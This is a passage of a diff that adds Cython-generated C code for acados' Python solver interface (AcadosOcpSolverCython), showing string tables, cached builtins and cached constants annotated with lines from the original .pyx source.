sizeof(__pyx_k_solver_option_must_be_of_type_in), 0, 1, 0, 0}, + {&__pyx_kp_u_solver_option_must_be_of_type_st, __pyx_k_solver_option_must_be_of_type_st, sizeof(__pyx_k_solver_option_must_be_of_type_st), 0, 1, 0, 0}, + {&__pyx_n_s_sort_keys, __pyx_k_sort_keys, sizeof(__pyx_k_sort_keys), 0, 0, 1, 1}, + {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, + {&__pyx_n_s_split, __pyx_k_split, sizeof(__pyx_k_split), 0, 0, 1, 1}, + {&__pyx_n_s_sqp_iter, __pyx_k_sqp_iter, sizeof(__pyx_k_sqp_iter), 0, 0, 1, 1}, + {&__pyx_n_u_sqp_iter, __pyx_k_sqp_iter, sizeof(__pyx_k_sqp_iter), 0, 1, 0, 1}, + {&__pyx_n_s_stage, __pyx_k_stage, sizeof(__pyx_k_stage), 0, 0, 1, 1}, + {&__pyx_n_s_start, __pyx_k_start, sizeof(__pyx_k_start), 0, 0, 1, 1}, + {&__pyx_n_s_stat_m, __pyx_k_stat_m, sizeof(__pyx_k_stat_m), 0, 0, 1, 1}, + {&__pyx_n_u_stat_m, __pyx_k_stat_m, sizeof(__pyx_k_stat_m), 0, 1, 0, 1}, + {&__pyx_n_s_stat_n, __pyx_k_stat_n, sizeof(__pyx_k_stat_n), 0, 0, 1, 1}, + {&__pyx_n_u_stat_n, __pyx_k_stat_n, sizeof(__pyx_k_stat_n), 0, 1, 0, 1}, + {&__pyx_n_u_statistics, __pyx_k_statistics, sizeof(__pyx_k_statistics), 0, 1, 0, 1}, + {&__pyx_n_s_step, __pyx_k_step, sizeof(__pyx_k_step), 0, 0, 1, 1}, + {&__pyx_n_u_step_length, __pyx_k_step_length, sizeof(__pyx_k_step_length), 0, 1, 0, 1}, + {&__pyx_n_s_stop, __pyx_k_stop, sizeof(__pyx_k_stop), 0, 0, 1, 1}, + {&__pyx_n_s_store_iterate, __pyx_k_store_iterate, sizeof(__pyx_k_store_iterate), 0, 0, 1, 1}, + {&__pyx_n_s_store_iterate_locals_lambda, __pyx_k_store_iterate_locals_lambda, sizeof(__pyx_k_store_iterate_locals_lambda), 0, 0, 1, 1}, + {&__pyx_kp_u_stored_current_iterate_in, __pyx_k_stored_current_iterate_in, sizeof(__pyx_k_stored_current_iterate_in), 0, 1, 0, 0}, + {&__pyx_n_s_strftime, __pyx_k_strftime, sizeof(__pyx_k_strftime), 0, 0, 1, 1}, + {&__pyx_kp_s_strided_and_direct, __pyx_k_strided_and_direct, sizeof(__pyx_k_strided_and_direct), 0, 0, 1, 0}, + {&__pyx_kp_s_strided_and_direct_or_indirect, __pyx_k_strided_and_direct_or_indirect, sizeof(__pyx_k_strided_and_direct_or_indirect), 0, 0, 1, 0}, + {&__pyx_kp_s_strided_and_indirect, __pyx_k_strided_and_indirect, sizeof(__pyx_k_strided_and_indirect), 0, 0, 1, 0}, + {&__pyx_n_s_string_fields, __pyx_k_string_fields, sizeof(__pyx_k_string_fields), 0, 0, 1, 1}, + {&__pyx_n_s_string_value, __pyx_k_string_value, sizeof(__pyx_k_string_value), 0, 0, 1, 1}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_struct, __pyx_k_struct, sizeof(__pyx_k_struct), 0, 0, 1, 1}, + {&__pyx_n_u_su, __pyx_k_su, sizeof(__pyx_k_su), 0, 1, 0, 1}, + {&__pyx_n_u_su_2, __pyx_k_su_2, sizeof(__pyx_k_su_2), 0, 1, 0, 1}, + {&__pyx_n_s_sys, __pyx_k_sys, sizeof(__pyx_k_sys), 0, 0, 1, 1}, + {&__pyx_n_u_t, __pyx_k_t, sizeof(__pyx_k_t), 0, 1, 0, 1}, + {&__pyx_n_u_t_2, __pyx_k_t_2, sizeof(__pyx_k_t_2), 0, 1, 0, 1}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_kp_s_third_party_acados_acados_templa, __pyx_k_third_party_acados_acados_templa, sizeof(__pyx_k_third_party_acados_acados_templa), 0, 0, 1, 0}, + {&__pyx_n_u_time_glob, __pyx_k_time_glob, sizeof(__pyx_k_time_glob), 0, 1, 0, 1}, + {&__pyx_n_u_time_lin, __pyx_k_time_lin, sizeof(__pyx_k_time_lin), 0, 1, 0, 1}, + {&__pyx_n_u_time_qp, __pyx_k_time_qp, sizeof(__pyx_k_time_qp), 0, 1, 0, 1}, + {&__pyx_n_u_time_qp_solver_call, __pyx_k_time_qp_solver_call, sizeof(__pyx_k_time_qp_solver_call), 0, 1, 0, 1}, + {&__pyx_n_u_time_qp_xcond, __pyx_k_time_qp_xcond, sizeof(__pyx_k_time_qp_xcond), 0, 1, 0, 1}, + {&__pyx_n_u_time_reg, __pyx_k_time_reg, sizeof(__pyx_k_time_reg), 0, 1, 0, 1}, + {&__pyx_n_u_time_sim, __pyx_k_time_sim, sizeof(__pyx_k_time_sim), 0, 1, 0, 1}, + {&__pyx_n_u_time_sim_ad, __pyx_k_time_sim_ad, sizeof(__pyx_k_time_sim_ad), 0, 1, 0, 1}, + {&__pyx_n_u_time_sim_la, __pyx_k_time_sim_la, sizeof(__pyx_k_time_sim_la), 0, 1, 0, 1}, + {&__pyx_n_u_time_solution_sensitivities, __pyx_k_time_solution_sensitivities, sizeof(__pyx_k_time_solution_sensitivities), 0, 1, 0, 1}, + {&__pyx_n_u_time_tot, __pyx_k_time_tot, sizeof(__pyx_k_time_tot), 0, 1, 0, 1}, + {&__pyx_n_u_tol_comp, __pyx_k_tol_comp, sizeof(__pyx_k_tol_comp), 0, 1, 0, 1}, + {&__pyx_n_u_tol_eq, __pyx_k_tol_eq, sizeof(__pyx_k_tol_eq), 0, 1, 0, 1}, + {&__pyx_n_u_tol_ineq, __pyx_k_tol_ineq, sizeof(__pyx_k_tol_ineq), 0, 1, 0, 1}, + {&__pyx_n_u_tol_stat, __pyx_k_tol_stat, sizeof(__pyx_k_tol_stat), 0, 1, 0, 1}, + {&__pyx_n_s_tolist, __pyx_k_tolist, sizeof(__pyx_k_tolist), 0, 0, 1, 1}, + {&__pyx_n_u_u, __pyx_k_u, sizeof(__pyx_k_u), 0, 1, 0, 1}, + {&__pyx_n_u_u_2, __pyx_k_u_2, sizeof(__pyx_k_u_2), 0, 1, 0, 1}, + {&__pyx_n_u_ubu, __pyx_k_ubu, sizeof(__pyx_k_ubu), 0, 1, 0, 1}, + {&__pyx_n_u_ubx, __pyx_k_ubx, sizeof(__pyx_k_ubx), 0, 1, 0, 1}, + {&__pyx_kp_s_unable_to_allocate_array_data, __pyx_k_unable_to_allocate_array_data, sizeof(__pyx_k_unable_to_allocate_array_data), 0, 0, 1, 0}, + {&__pyx_kp_s_unable_to_allocate_shape_and_str, __pyx_k_unable_to_allocate_shape_and_str, sizeof(__pyx_k_unable_to_allocate_shape_and_str), 0, 0, 1, 0}, + {&__pyx_n_s_unpack, __pyx_k_unpack, sizeof(__pyx_k_unpack), 0, 0, 1, 1}, + {&__pyx_n_s_update, __pyx_k_update, sizeof(__pyx_k_update), 0, 0, 1, 1}, + {&__pyx_n_s_update_qp_solver_cond_N, __pyx_k_update_qp_solver_cond_N, sizeof(__pyx_k_update_qp_solver_cond_N), 0, 0, 1, 1}, + {&__pyx_n_s_utcnow, __pyx_k_utcnow, sizeof(__pyx_k_utcnow), 0, 0, 1, 1}, + {&__pyx_kp_u_utf_8, __pyx_k_utf_8, sizeof(__pyx_k_utf_8), 0, 1, 0, 0}, + {&__pyx_n_s_value, __pyx_k_value, sizeof(__pyx_k_value), 0, 0, 1, 1}, + {&__pyx_n_s_value_2, __pyx_k_value_2, sizeof(__pyx_k_value_2), 0, 0, 1, 1}, + {&__pyx_n_s_value_shape, __pyx_k_value_shape, sizeof(__pyx_k_value_shape), 0, 0, 1, 1}, + {&__pyx_n_s_version_info, __pyx_k_version_info, sizeof(__pyx_k_version_info), 0, 0, 1, 1}, + {&__pyx_n_u_w, __pyx_k_w, sizeof(__pyx_k_w), 0, 1, 0, 1}, + {&__pyx_n_u_warm_start_first_qp, __pyx_k_warm_start_first_qp, sizeof(__pyx_k_warm_start_first_qp), 0, 1, 0, 1}, + {&__pyx_kp_u_with_dimension, __pyx_k_with_dimension, sizeof(__pyx_k_with_dimension), 0, 1, 0, 0}, + {&__pyx_kp_u_with_dimension_you_have, __pyx_k_with_dimension_you_have, sizeof(__pyx_k_with_dimension_you_have), 0, 1, 0, 0}, + {&__pyx_n_b_x, __pyx_k_x, sizeof(__pyx_k_x), 0, 0, 0, 1}, + {&__pyx_n_s_x, __pyx_k_x, sizeof(__pyx_k_x), 0, 0, 1, 1}, + {&__pyx_n_u_x, __pyx_k_x, sizeof(__pyx_k_x), 0, 1, 0, 1}, + {&__pyx_n_u_x_2, __pyx_k_x_2, sizeof(__pyx_k_x_2), 0, 1, 0, 1}, + {&__pyx_n_u_xdot_guess, __pyx_k_xdot_guess, sizeof(__pyx_k_xdot_guess), 0, 1, 0, 1}, + {&__pyx_n_u_y_ref, __pyx_k_y_ref, sizeof(__pyx_k_y_ref), 0, 1, 0, 1}, + {&__pyx_kp_u_you_have, __pyx_k_you_have, sizeof(__pyx_k_you_have), 0, 1, 0, 0}, + {&__pyx_n_u_yref, __pyx_k_yref, sizeof(__pyx_k_yref), 0, 1, 0, 1}, + {&__pyx_n_u_z, __pyx_k_z, sizeof(__pyx_k_z), 0, 1, 0, 1}, + {&__pyx_n_u_z_2, __pyx_k_z_2, sizeof(__pyx_k_z_2), 0, 1, 0, 1}, + {&__pyx_n_u_z_guess, __pyx_k_z_guess, sizeof(__pyx_k_z_guess), 0, 1, 0, 1}, + {&__pyx_n_s_zeros, __pyx_k_zeros, sizeof(__pyx_k_zeros), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + __pyx_builtin_AssertionError = __Pyx_GetBuiltinName(__pyx_n_s_AssertionError); if (!__pyx_builtin_AssertionError) __PYX_ERR(0, 86, __pyx_L1_error) + __pyx_builtin_NotImplementedError = __Pyx_GetBuiltinName(__pyx_n_s_NotImplementedError); if (!__pyx_builtin_NotImplementedError) __PYX_ERR(0, 134, __pyx_L1_error) + __pyx_builtin_range = __Pyx_GetBuiltinName(__pyx_n_s_range); if (!__pyx_builtin_range) __PYX_ERR(0, 313, __pyx_L1_error) + __pyx_builtin_open = __Pyx_GetBuiltinName(__pyx_n_s_open); if (!__pyx_builtin_open) __PYX_ERR(0, 325, __pyx_L1_error) + __pyx_builtin_print = __Pyx_GetBuiltinName(__pyx_n_s_print); if (!__pyx_builtin_print) __PYX_ERR(0, 327, __pyx_L1_error) + __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(1, 2, __pyx_L1_error) + __pyx_builtin___import__ = __Pyx_GetBuiltinName(__pyx_n_s_import); if (!__pyx_builtin___import__) __PYX_ERR(1, 100, __pyx_L1_error) + __pyx_builtin_ValueError = __Pyx_GetBuiltinName(__pyx_n_s_ValueError); if (!__pyx_builtin_ValueError) __PYX_ERR(1, 141, __pyx_L1_error) + __pyx_builtin_MemoryError = __Pyx_GetBuiltinName(__pyx_n_s_MemoryError); if (!__pyx_builtin_MemoryError) __PYX_ERR(1, 156, __pyx_L1_error) + __pyx_builtin_enumerate = __Pyx_GetBuiltinName(__pyx_n_s_enumerate); if (!__pyx_builtin_enumerate) __PYX_ERR(1, 159, __pyx_L1_error) + __pyx_builtin_Ellipsis = __Pyx_GetBuiltinName(__pyx_n_s_Ellipsis); if (!__pyx_builtin_Ellipsis) __PYX_ERR(1, 408, __pyx_L1_error) + __pyx_builtin_id = __Pyx_GetBuiltinName(__pyx_n_s_id); if (!__pyx_builtin_id) __PYX_ERR(1, 618, __pyx_L1_error) + __pyx_builtin_IndexError = __Pyx_GetBuiltinName(__pyx_n_s_IndexError); if (!__pyx_builtin_IndexError) __PYX_ERR(1, 914, __pyx_L1_error) + __pyx_builtin_ImportError = __Pyx_GetBuiltinName(__pyx_n_s_ImportError); if (!__pyx_builtin_ImportError) __PYX_ERR(2, 986, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "View.MemoryView":582 + * def suboffsets(self): + * if self.view.suboffsets == NULL: + * return (-1,) * self.view.ndim # <<<<<<<<<<<<<< + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + */ + __pyx_tuple__4 = PyTuple_New(1); if (unlikely(!__pyx_tuple__4)) __PYX_ERR(1, 582, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__4); + __Pyx_INCREF(__pyx_int_neg_1); + __Pyx_GIVEREF(__pyx_int_neg_1); + PyTuple_SET_ITEM(__pyx_tuple__4, 0, __pyx_int_neg_1); + __Pyx_GIVEREF(__pyx_tuple__4); + + /* "View.MemoryView":679 + * tup = index if isinstance(index, tuple) else (index,) + * + * result = [slice(None)] * ndim # <<<<<<<<<<<<<< + * have_slices = False + * seen_ellipsis = False + */ + __pyx_slice__5 = PySlice_New(Py_None, Py_None, Py_None); if (unlikely(!__pyx_slice__5)) __PYX_ERR(1, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_slice__5); + __Pyx_GIVEREF(__pyx_slice__5); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + __pyx_tuple__8 = PyTuple_Pack(3, __pyx_int_136983863, __pyx_int_112105877, __pyx_int_184977713); if (unlikely(!__pyx_tuple__8)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__8); + __Pyx_GIVEREF(__pyx_tuple__8); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_tuple__9 = PyTuple_Pack(1, __pyx_kp_u_numpy_core_multiarray_failed_to); if (unlikely(!__pyx_tuple__9)) __PYX_ERR(2, 986, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__9); + __Pyx_GIVEREF(__pyx_tuple__9); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_tuple__10 = PyTuple_Pack(1, __pyx_kp_u_numpy_core_umath_failed_to_impor); if (unlikely(!__pyx_tuple__10)) __PYX_ERR(2, 992, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__10); + __Pyx_GIVEREF(__pyx_tuple__10); + + /* "acados_template/acados_ocp_solver_pyx.pyx":134 + * """ + * + * raise NotImplementedError("AcadosOcpSolverCython: does not support set_new_time_steps() since it is only a prototyping feature") # <<<<<<<<<<<<<< + * # # unlikely but still possible + * # if not self.solver_created: + */ + __pyx_tuple__11 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_does_not_s); if (unlikely(!__pyx_tuple__11)) __PYX_ERR(0, 134, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__11); + __Pyx_GIVEREF(__pyx_tuple__11); + + /* "acados_template/acados_ocp_solver_pyx.pyx":186 + * `qp_solver_cond_N < N`. + * """ + * raise NotImplementedError("AcadosOcpSolverCython: does not support update_qp_solver_cond_N() since it is only a prototyping feature") # <<<<<<<<<<<<<< + * + * # # unlikely but still possible + */ + __pyx_tuple__12 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_does_not_s_2); if (unlikely(!__pyx_tuple__12)) __PYX_ERR(0, 186, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__12); + __Pyx_GIVEREF(__pyx_tuple__12); + + /* "acados_template/acados_ocp_solver_pyx.pyx":219 + * # checks + * if not isinstance(index, int): + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') # <<<<<<<<<<<<<< + * + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) + */ + __pyx_tuple__13 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_eval_param); if (unlikely(!__pyx_tuple__13)) __PYX_ERR(0, 219, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__13); + __Pyx_GIVEREF(__pyx_tuple__13); + + /* "acados_template/acados_ocp_solver_pyx.pyx":307 + * # append timestamp + * if os.path.isfile(filename): + * filename = filename[:-5] # <<<<<<<<<<<<<< + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' + * + */ + __pyx_slice__16 = PySlice_New(Py_None, __pyx_int_neg_5, Py_None); if (unlikely(!__pyx_slice__16)) __PYX_ERR(0, 307, __pyx_L1_error) + __Pyx_GOTREF(__pyx_slice__16); + __Pyx_GIVEREF(__pyx_slice__16); + + /* "acados_template/acados_ocp_solver_pyx.pyx":325 + * + * # save + * with open(filename, 'w') as f: # <<<<<<<<<<<<<< + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + */ + __pyx_tuple__17 = PyTuple_Pack(3, Py_None, Py_None, Py_None); if (unlikely(!__pyx_tuple__17)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__17); + __Pyx_GIVEREF(__pyx_tuple__17); + + /* "acados_template/acados_ocp_solver_pyx.pyx":410 + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + * return full_stats[6, :] # <<<<<<<<<<<<<< + * elif self.nlp_solver_type == 'SQP_RTI': + * return full_stats[2, :] + */ + __pyx_tuple__18 = PyTuple_Pack(2, __pyx_int_6, __pyx_slice__5); if (unlikely(!__pyx_tuple__18)) __PYX_ERR(0, 410, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__18); + __Pyx_GIVEREF(__pyx_tuple__18); + + /* "acados_template/acados_ocp_solver_pyx.pyx":412 + * return full_stats[6, :] + * elif self.nlp_solver_type == 'SQP_RTI': + * return full_stats[2, :] # <<<<<<<<<<<<<< + * + * elif field_ == 'alpha': + */ + __pyx_tuple__19 = PyTuple_Pack(2, __pyx_int_2, __pyx_slice__5); if (unlikely(!__pyx_tuple__19)) __PYX_ERR(0, 412, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__19); + __Pyx_GIVEREF(__pyx_tuple__19); + + /* "acados_template/acados_ocp_solver_pyx.pyx":417 + * full_stats = self.get_stats('statistics') + * if self.nlp_solver_type == 'SQP': + * return full_stats[7, :] # <<<<<<<<<<<<<< + * else: # self.nlp_solver_type == 'SQP_RTI': + * raise Exception("alpha values are not available for SQP_RTI") + */ + __pyx_tuple__20 = PyTuple_Pack(2, __pyx_int_7, __pyx_slice__5); if (unlikely(!__pyx_tuple__20)) __PYX_ERR(0, 417, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__20); + __Pyx_GIVEREF(__pyx_tuple__20); + + /* "acados_template/acados_ocp_solver_pyx.pyx":419 + * return full_stats[7, :] + * else: # self.nlp_solver_type == 'SQP_RTI': + * raise Exception("alpha values are not available for SQP_RTI") # <<<<<<<<<<<<<< + * + * elif field_ == 'residuals': + */ + __pyx_tuple__21 = PyTuple_Pack(1, __pyx_kp_u_alpha_values_are_not_available_f); if (unlikely(!__pyx_tuple__21)) __PYX_ERR(0, 419, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__21); + __Pyx_GIVEREF(__pyx_tuple__21); + + /* "acados_template/acados_ocp_solver_pyx.pyx":425 + * + * else: + * raise NotImplementedError("TODO!") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__22 = PyTuple_Pack(1, __pyx_kp_u_TODO); if (unlikely(!__pyx_tuple__22)) __PYX_ERR(0, 425, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__22); + __Pyx_GIVEREF(__pyx_tuple__22); + + /* "acados_template/acados_ocp_solver_pyx.pyx":434 + * + * def __get_stat_double(self, field): + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((1,)) # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out.data) + * return out + */ + __pyx_tuple__23 = PyTuple_Pack(1, __pyx_int_1); if (unlikely(!__pyx_tuple__23)) __PYX_ERR(0, 434, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__23); + __Pyx_GIVEREF(__pyx_tuple__23); + + /* "acados_template/acados_ocp_solver_pyx.pyx":469 + * + * # create output array + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.ascontiguousarray(np.zeros((4,), dtype=np.float64)) # <<<<<<<<<<<<<< + * cdef double double_value + * + */ + __pyx_tuple__24 = PyTuple_Pack(1, __pyx_int_4); if (unlikely(!__pyx_tuple__24)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__24); + __Pyx_GIVEREF(__pyx_tuple__24); + __pyx_tuple__25 = PyTuple_Pack(1, __pyx_tuple__24); if (unlikely(!__pyx_tuple__25)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__25); + __Pyx_GIVEREF(__pyx_tuple__25); + + /* "acados_template/acados_ocp_solver_pyx.pyx":570 + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) # <<<<<<<<<<<<<< + * + * elif len(value_shape) == 2: + */ + __pyx_tuple__26 = PyTuple_Pack(2, Py_None, __pyx_slice__5); if (unlikely(!__pyx_tuple__26)) __PYX_ERR(0, 570, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__26); + __Pyx_GIVEREF(__pyx_tuple__26); + + /* "acados_template/acados_ocp_solver_pyx.pyx":676 + * if field_ == 'rti_phase': + * if value_ < 0 or value_ > 2: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' # <<<<<<<<<<<<<< + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: + */ + __pyx_tuple__27 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_solve_argu); if (unlikely(!__pyx_tuple__27)) __PYX_ERR(0, 676, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__27); + __Pyx_GIVEREF(__pyx_tuple__27); + + /* "acados_template/acados_ocp_solver_pyx.pyx":679 + * 'take only values 0, 1, 2 for SQP-RTI-type solvers') + * if self.nlp_solver_type != 'SQP_RTI' and value_ > 0: + * raise Exception('AcadosOcpSolverCython.solve(): argument \'rti_phase\' can ' # <<<<<<<<<<<<<< + * 'take only value 0 for SQP-type solvers') + * + */ + __pyx_tuple__28 = PyTuple_Pack(1, __pyx_kp_u_AcadosOcpSolverCython_solve_argu_2); if (unlikely(!__pyx_tuple__28)) __PYX_ERR(0, 679, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__28); + __Pyx_GIVEREF(__pyx_tuple__28); + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + __pyx_tuple__30 = PyTuple_Pack(1, __pyx_n_s_sys); if (unlikely(!__pyx_tuple__30)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__30); + __Pyx_GIVEREF(__pyx_tuple__30); + __pyx_tuple__31 = PyTuple_Pack(2, __pyx_int_3, __pyx_int_3); if (unlikely(!__pyx_tuple__31)) __PYX_ERR(1, 100, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__31); + __Pyx_GIVEREF(__pyx_tuple__31); + + /* "View.MemoryView":101 + * try: + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence # <<<<<<<<<<<<<< + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + */ + __pyx_tuple__32 = PyTuple_Pack(1, __pyx_kp_s_collections_abc); if (unlikely(!__pyx_tuple__32)) __PYX_ERR(1, 101, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__32); + __Pyx_GIVEREF(__pyx_tuple__32); + + /* "View.MemoryView":103 + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence # <<<<<<<<<<<<<< + * except: + * + */ + __pyx_tuple__33 = PyTuple_Pack(1, __pyx_n_s_collections); if (unlikely(!__pyx_tuple__33)) __PYX_ERR(1, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__33); + __Pyx_GIVEREF(__pyx_tuple__33); + + /* "View.MemoryView":309 + * return self.name + * + * cdef generic = Enum("") # <<<<<<<<<<<<<< + * cdef strided = Enum("") # default + * cdef indirect = Enum("") + */ + __pyx_tuple__34 = PyTuple_Pack(1, __pyx_kp_s_strided_and_direct_or_indirect); if (unlikely(!__pyx_tuple__34)) __PYX_ERR(1, 309, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__34); + __Pyx_GIVEREF(__pyx_tuple__34); + + /* "View.MemoryView":310 + * + * cdef generic = Enum("") + * cdef strided = Enum("") # default # <<<<<<<<<<<<<< + * cdef indirect = Enum("") + * + */ + __pyx_tuple__35 = PyTuple_Pack(1, __pyx_kp_s_strided_and_direct); if (unlikely(!__pyx_tuple__35)) __PYX_ERR(1, 310, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__35); + __Pyx_GIVEREF(__pyx_tuple__35); + + /* "View.MemoryView":311 + * cdef generic = Enum("") + * cdef strided = Enum("") # default + * cdef indirect = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__36 = PyTuple_Pack(1, __pyx_kp_s_strided_and_indirect); if (unlikely(!__pyx_tuple__36)) __PYX_ERR(1, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__36); + __Pyx_GIVEREF(__pyx_tuple__36); + + /* "View.MemoryView":314 + * + * + * cdef contiguous = Enum("") # <<<<<<<<<<<<<< + * cdef indirect_contiguous = Enum("") + * + */ + __pyx_tuple__37 = PyTuple_Pack(1, __pyx_kp_s_contiguous_and_direct); if (unlikely(!__pyx_tuple__37)) __PYX_ERR(1, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__37); + __Pyx_GIVEREF(__pyx_tuple__37); + + /* "View.MemoryView":315 + * + * cdef contiguous = Enum("") + * cdef indirect_contiguous = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_tuple__38 = PyTuple_Pack(1, __pyx_kp_s_contiguous_and_indirect); if (unlikely(!__pyx_tuple__38)) __PYX_ERR(1, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__38); + __Pyx_GIVEREF(__pyx_tuple__38); + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_tuple__39 = PyTuple_Pack(5, __pyx_n_s_pyx_type, __pyx_n_s_pyx_checksum, __pyx_n_s_pyx_state, __pyx_n_s_pyx_PickleError, __pyx_n_s_pyx_result); if (unlikely(!__pyx_tuple__39)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__39); + __Pyx_GIVEREF(__pyx_tuple__39); + __pyx_codeobj__40 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__39, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_pyx_unpickle_Enum, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__40)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":94 + * + * + * def __get_pointers_solver(self): # <<<<<<<<<<<<<< + * """ + * Private function to get the pointers for solver + */ + __pyx_tuple__41 = PyTuple_Pack(1, __pyx_n_s_self); if (unlikely(!__pyx_tuple__41)) __PYX_ERR(0, 94, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__41); + __Pyx_GIVEREF(__pyx_tuple__41); + __pyx_codeobj__42 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__41, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_third_party_acados_acados_templa, __pyx_n_s_get_pointers_solver, 